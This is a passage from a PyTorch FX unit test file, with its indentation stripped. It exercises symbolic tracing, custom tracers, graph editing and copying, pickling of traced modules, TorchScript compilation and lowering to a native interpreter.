input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
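# With `record_stack_traces` enabled, every non-output node should carry the Python stack
# trace of the call site that created it.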
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, f"Unsupported call target {target}"
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the specified return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in fx_module.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
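# Each GraphModule gets its own generated class, so a deep copy is expected to have a
# distinct type object even though it computes the same result.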
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
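# ProxyableClassMeta makes TensorPair construction traceable, so literal TensorPair values
# created inside the traced function become nodes in the graph rather than constants.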
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
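# replace_all_uses_with reroutes the output to `relu`, after which `neg` has no users and
# can be erased; the users map must reflect the removal.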
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
